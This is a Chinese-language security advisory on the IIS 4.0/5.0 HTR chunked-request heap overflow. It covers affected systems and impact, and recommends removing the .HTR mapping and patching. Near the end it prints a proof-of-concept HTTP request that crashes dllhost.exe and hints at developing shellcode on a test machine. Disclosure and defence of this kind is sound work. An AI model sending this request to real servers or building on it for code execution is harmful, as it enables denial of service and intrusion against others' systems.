涉及程序：

IIS4.0/5.0 

详细：

受影响的系统：
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0

在IIS服务器处理HTR请求过程中，存在一个缺陷，如果攻击者细致构造一个特殊的请求，可以执行目标主机上的任何指令。攻击者利用它构造的数据包可以覆盖heap上的一个片段地址(包含内存管理的数据结构)，产生溢出，接下来的数据可以覆盖4个字节的指针，这个内存地址和内容可以是攻击者指定的，通过这样的非法溢出操作，可以控制程序以最高权限执行任意的攻击代码(shellcode)。

这是一个非常严重的安全漏洞，其后果超过今年4月被披露的htr ISAPI堆栈溢出错误(这个漏洞在IIS5.0上只有IWAM_computername用户的权限)。
这个漏洞的发现者eEye指出：或许有人认为这个漏洞要用到穷举方式尝试shellcode，是比较难以获得理想攻击效果，所以风险并不高。这种认识是片面的。黑客可以开发出一个有效的，一次到位的攻击代码。实际上，攻击者可以覆盖目标的静态全局变量、已存储函数指针、进程管理和内存管理结构，以及其它的任意数据类型，以获得对目标程序的控制。
　

解决方案：

建议彻底删除.HTR应用程序映射
补丁下载

攻击方法：

概念攻击脚本：（后果引起dllhost.exe子进程死掉）：

**************Begin Session****************
POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked

20
XXXXXXXXXXXXXXXXXXXXXXXXEEYE2002
0
[enter]
[enter]
**************End Session******************

想要尝试获得非法执行代码的效果，可以在被攻击的测试机器上运行调试程序以便求得合适的shellcode。

主目录 分目录